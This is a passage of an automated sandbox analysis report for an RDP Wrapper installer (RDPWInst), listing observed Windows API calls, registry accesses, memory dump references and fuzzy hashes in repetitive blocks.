                                                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                                                  • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                                                                                                  • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3749826553-0
                                                                                                                                  • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                                                                  • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                                                                                                  • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                                                                  • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                                                                                                  APIs
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                                                                                                  • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                  • String ID: $zD$xPD
                                                                                                                                  • API String ID: 1263568516-535612291
                                                                                                                                  • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                                                                  • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                                                                                                  • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                                                                  • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                                                  • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                                                                                                  • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                                                  • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                                                  • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                                                  • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                                    • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                    • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                    • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                    • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3490077880-0
                                                                                                                                  • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                                                  • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                                                                                                  • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                                                  • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                                                  • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                                                  • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                                    • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                    • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                    • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                    • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3490077880-0
                                                                                                                                  • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                                                  • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                                                                                                  • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                                                  • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                                                  • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                                                  • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                                    • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                    • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                    • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                    • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3490077880-0
                                                                                                                                  • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                                                  • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                                                                                                  • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                                                  • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID: $zD$$zD
                                                                                                                                  • API String ID: 4275171209-354537599
                                                                                                                                  • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                                                  • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                                                                                                  • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                                                  • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                                                  • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                                                                                                  • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                                                  • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: ImagePath
                                                                                                                                  • API String ID: 3660427363-1008103227
                                                                                                                                  • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                                                  • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                                                                                                  • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                                                  • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID: $sD
                                                                                                                                  • API String ID: 71445658-3047594130
                                                                                                                                  • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                                                  • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                                                                                                  • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                                                  • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value
                                                                                                                                  • String ID: ServiceDll
                                                                                                                                  • API String ID: 3702945584-3252591312
                                                                                                                                  • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                                                  • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                                                                                                  • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                                                  • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen
                                                                                                                                  • String ID: $sD
                                                                                                                                  • API String ID: 47109696-3047594130
                                                                                                                                  • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                                                  • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                                                                                                  • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                                                  • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                                                                                                  APIs
